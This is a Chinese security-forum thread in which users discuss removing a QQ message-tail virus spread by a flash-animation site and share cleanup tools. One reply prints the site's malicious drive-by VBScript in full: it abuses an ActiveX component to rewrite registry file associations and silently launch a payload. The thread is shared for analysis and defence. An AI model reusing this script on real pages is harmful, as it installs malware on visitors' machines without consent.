|
 | 作者: hacker [xieyanzi]
 论坛用户
|
登录 |
| 有没有HTTP;//FLASH2。533。NET这个QQ尾巴的杀毒办法啊! 总是在QQ消息后面加上:向你介绍一个好看的动画网:http://flash2.533.net 怎么办啊,找不到解决办法! |
| 地主 发表时间: 11/04 22:37 |
 | 回复: kdbilly [kdbilly] 论坛用户 |
登录 |
|
http://qqdl.tencent.com/duba_qqmsg.exe QQ病毒清理工具下载网址~ |
| B1层 发表时间: 11/05 11:17 |
 | 回复: zhengzheng [zhengzheng]  论坛用户 |
登录 |
|
金山毒霸下载网址:http://www.duba.net/download/ |
| B2层 发表时间: 11/06 02:04 |
 | 回复: dearyuxiao [dearyuxiao] 论坛用户 |
登录 |
|
http://qqdl.tencent.com/duba_qqmsg.exe 这个不行啊!!!! 我用了,毒是杀了! 可是捎带脚把我的一些系统文件删了! 系统被它整崩溃了! 害的我重装了一遍系统 |
| B3层 发表时间: 11/08 21:59 |
| 回复: kdbilly [kdbilly] 论坛用户 |
登录 |
|
那是你自己删错了,跟软件无关~ 我怎么没事~ 我自己搞了个QQ病毒,杀了后系统一点问题没有 |
| B4层 发表时间: 11/09 09:39 |
 | 回复: moley [moley]  论坛用户 |
登录 |
|
以下是:http://flash2.533.net 的网站QQ病毒的恶意代码,好象太老套了,呵呵! <BODY onload="vbscript:aa()"></BODY> <Script Language=VBScript> document.write "<APPLET NAME=MJ_ghost HEIGHT=0 WIDTH=0 code=com.ms.a"&"ctiveX.ActiveX"&"Component> </APPLET>" Function aa() On error resume next Dim AppleObject,Ws Set AppleObject = document.applets("MJ_ghost") AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance Set Ws = AppleObject.GetObject() Ws.RegWrite "HKCR\.sys\","sysfile" Ws.RegWrite "HKCR\sysfile\EditFlags",&H10000,"REG_BINARY" Ws.RegWrite "HKCR\sysfile\shell\open\command\","""%1"" %*" Ws.RegWrite "HKCR\.tmp\","tmpfile" Ws.RegWrite "HKCR\tmpfile\EditFlags",&H10000,"REG_BINARY" Ws.RegWrite "HKCR\tmpfile\shell\open\command\","""%1"" %*" if err=438 or err=424 then Location="nots.htm" else window.open "b.sys",0,"height=0,width=0,top=3000,left=3000" document.write "<embed width=100% height=100% fullscreen=yes src='huanghe.swf'>" end if End Function </Script> |
| B5层 发表时间: 11/09 19:12 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 有没有HTTP;//FLASH2。533。NET这个QQ尾巴的杀毒办法啊!